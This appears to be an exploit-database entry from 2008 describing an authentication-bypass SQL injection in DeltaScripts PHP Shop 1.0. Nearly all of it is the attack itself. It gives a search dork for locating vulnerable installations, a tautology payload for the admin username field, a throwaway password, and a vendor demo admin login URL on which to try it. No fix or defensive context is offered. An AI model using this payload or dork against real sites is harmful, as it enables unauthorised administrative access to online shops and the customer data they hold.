id: 4100
date: 11/06/2008
title: DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
author: ZoRLu
cves: 

===================================================================
DeltaScripts PHP Shop 1.0 (Auth Bypass) SQL Injection Vulnerability
===================================================================


[~] deltascripts phpShop Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] dork: "Powered by PHP Shop from DeltaScripts"
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin 


admin login for demo:

http://demo.deltascripts.com/phpshop/admin/login.php


example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu



#  0day.today [2023-03-23]  #